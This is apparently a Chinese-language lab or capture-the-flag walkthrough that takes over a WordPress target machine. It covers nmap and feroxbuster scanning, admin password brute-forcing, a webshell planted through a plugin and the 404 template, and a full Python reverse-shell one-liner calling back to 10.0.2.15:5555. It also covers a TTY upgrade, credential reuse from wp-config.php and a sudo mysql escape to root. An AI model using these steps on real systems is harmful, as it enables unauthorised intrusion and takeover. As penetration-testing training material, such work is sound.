1.首先使用nmap -sn 来进行主机发现
nmap -sn 10.0.2.4/24
2.进行服务探针
3.使用feroxbuster进行路径发现
feroxbuster --url http://10.0.2.9
4.进入后台管理页面,进行密码爆破
5.进入后台后,media上传马,plugin插件上传,appearance里面修改404页面代码插入木马
6.通过编写插件上传
7.访问插件目录,传参命令执行获取反弹shell
python3 -c ‘import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“10.0.2.15”,5555));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,“-i”]);’
8.发现bash指令受限,开始更改为交互式的shell (只适用于bshell)
ctrl+z 将获得的shell进程隐藏
stty raw -echo stty echo 取消不显设置 rstty时一个用来改变并打印终端行设置的常用命令。
fg 将后台的命令调到前台来 发现仍然无法正常执行,原因是因为kali
上面用的是zshell不是bshell,但是目标靶机上用的是bshell
chsh -s /bin/bash 将kali上的zshell改为bshell
ctrl+r 重启kali
echo $SHELL 得到bashell
重启后:stty raw -echo
这个地方如果出现执行后无法执行命令,输入python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
就可以得到www-data@wp:/var/www/html/wordpress$
export SHELL=/bin/bash
export TREM=screen
stty rows 38 columns 116
reset
发现已经实现了所有的功能包括补齐等等
9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,
在真实渗透测试当中常常要获得多个shell保持shell的稳定可用
10.开始进行提权,查看etc下passwd下有wdamin管理员账号,
uname -a 利用内核提权漏洞失败
sudo提权失败
思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,
利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql -u admin -p Wp-Admin#123
-D wordpress发现也失败
想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件
11.二次提权
sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,
如果基于现在的进程执行bshell就可以获得系统的root权限
system id
! /bin/bash 于是获得系统root权限 !是system函数的简写
12.获得到第二个flag,打靶完成